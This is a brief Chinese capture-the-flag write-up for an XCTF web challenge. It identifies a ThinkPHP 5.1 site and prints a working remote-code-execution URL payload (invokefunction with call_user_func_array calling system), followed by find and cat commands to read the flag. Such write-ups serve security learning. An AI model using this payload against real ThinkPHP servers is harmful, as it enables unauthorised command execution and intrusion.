题目链接:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=5412
本题学到的:
使用 https://www.exploit-db.com/ 这个网站查漏洞,看网站有无可乘之机。
过程:
根据主页提示,可以发现网页使用的是ThinkPHP框架,版本为5.1
这里的payload:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
查看当前文件夹文件
使用find命令查找flag:
把ls换成:
find / -name flag
或者
find / -name '*flag'
得到
那么使用cat命令查看:
cat /flag
得到flag